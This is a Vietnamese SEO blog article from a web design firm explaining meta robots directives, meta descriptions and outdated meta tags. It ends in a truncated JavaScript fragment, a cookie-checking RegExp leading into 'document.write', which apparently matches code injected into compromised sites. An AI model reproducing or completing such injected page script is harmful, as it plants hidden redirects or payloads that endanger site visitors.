Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Cách sử dụng các thẻ trong SEO.

Cách sử dụng các thẻ trong SEO.

Các loại thẻ meta được sử dụng trong website để mô tả trước về nội dung của 1 ink, 1 bài viết hay 1 tag bất kì, bất kì website nào khi được tích hợp chức năng đặt các thẻ này và người quản trị sử dụng chúng một cách khoa học sẽ giúp thứ hạng tăng tăng một cách vững chắc, an toàn. Bài viết sẽ đi sâu vào các thẻ này và hướng dẫn bạn sử dụng chúng cho mục đích SEO.

Blog wordpress

I. Thẻ META ROBOTS

Thẻ Meta Robot được sử dụng để điều khiển hoạt động bò của robot trên cấp độ trang. Có  một số cách để sử dụng meta robots để điều khiển cách thức thu thập thông tin của robot trên một trang:

  • Index / Noindex – hai đặc tính này báo cho công cụ tìm kiếm biết nên thu thấp trang này và lưu trữ thông tin về nó hay không. Nếu bạn chọn thuộc tính “noindex”, các công cụ  tìm kiếm sẽ không lưu lại trang này và tính nó vào kết quả tìm kiếm. Công cụ tìm kiếm có tính năng mặc định lập chỉ mục tất cả các trang, như vậy bằng cách sử dụng giá trị “index” nên việc thêm thuộc tính Index vào thẻ này nói chung là không cần thiết.
  • Follow/NoFollow giúp báo cho robot nên thu thập dữ liệu hay không nên thu thập từ các liên kết trên trang . Nếu bạn chọn để sử dụng “nofollow”, robot sẽ bỏ qua các liên kết trên trang cho cả mục đích lập chỉ mục và xếp hạng. Bạn cũng không cần thêm thuộc tính “Follow” vào tất cả các liên kết mà tất cả các liên kết đã được đặt chế độ “follow”
  • NOarchive được sử dụng để hạn chế công cụ tìm kiếm lưu một bản sao lưu trữ của trang. Theo mặc định, các công cụ sẽ duy trì các bản sao của tất cả các trang web mà họ lập chỉ mục, có thể truy cập để tìm kiếm thông qua liên kết “lưu trữ” trong các kết quả tìm kiếm. Thuộc tính này giúp bạn cập nhật nhanh hơn sự thay đổi thuộc tính trong tittle hoặc nội dung lên công cụ tìm kiếm.
  • Nosnippet thông báo cho các công cụ bỏ qua một khối văn bản mô tả tiêu đề của trang và URL trong kết quả tìm kiếm.
  • NoODP là thẻ chuyên biệt thông báo với bộ máy tìm kiếm không lấy một đoạn mô tả về một trang từ Open Directory Project (DMOZ) để hiển thị trong kết quả tìm kiếm.
  • NoYDir, như NoODP, sử dung cho Yahoo!, thông báo rằng bộ máy không sử dụng thư mục mô tả của Yahoo về trang trong kết quả tìm kiếm.

II. Thẻ META DESCRIPTION

Thẻ meta description là một mô tả ngắn về nội dung của một trang. Công cụ tìm kiếm không sử dụng các từ khóa hoặc cụm từ trong thẻ này cho việc xếp  hạng website, nhưng meta description là đoạn văn bản được hiển thị bên dưới một danh sách trong kết quả. Nó chính là đoạn mô tả  để giúp bạn thu hút người dùng vào website của mình thông qua liên kết trên trang tìm kiếm.

Thẻ meta description phục vụ chức năng của một bản quảng cáo, thu hút người đọc đến trang web của bạn từ các kết quả và do đó, là một phần cực kỳ quan trọng của marketing online. Phác thảo một mô tả dễ đọc, hấp dẫn bằng cách sử dụng các từ khóa quan trọng (chú ý là Google tô đậm các từ khoá tìm kiếm trong phần mô tả) có thể khiến tỷ lệ kích chuột (CTR) vào website của bạn cao hơn.

Meta descriptions có thể dài tuỳ ý, nhưng công cụ tìm kiếm nói chung sẽ chỉ hiển thị 160 ký tự (như ví dụ trong ảnh dưới), do đó, tốt nhất là nên viết trong 160 kí tự.

Dịch vụ SEO pridio

III. MỘT SỐ LƯU Ý

  • Meta Keywords

Thẻ Meta Keywords đã từng  có ích nhưng hiện nay không có giá trị đối với việc tối ưu hoá công cụ tìm kiếm (SEO). Để biết thêm về lịch sử và lý do tại sao thẻ meta keywords không được dùng nữa, hay tham khảo một số bài viết về thuật toán Google của chúng tôi.

 

Thuật toán Google Penguin rất tốt cho SEO

 

Google Panda cập nhật 30/09

 

  • Meta refresh, meta revisit-after, meta content type, etc.

Mặc dù các thẻ có thể sử dụng để tối ưu hóa công cụ tìm kiếm, song chúng ít quan trọng đối với quá trình này, và vì vậy John Mueller đến từ Webmaster Central của Google để trả lời chi tiết hơn – Các thẻ Meta và Tìm kiếm Web.

Theo SEO Moz.
Sửa và lược dịch: Tk_nam.

Công ty thiết kế website Pridio

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘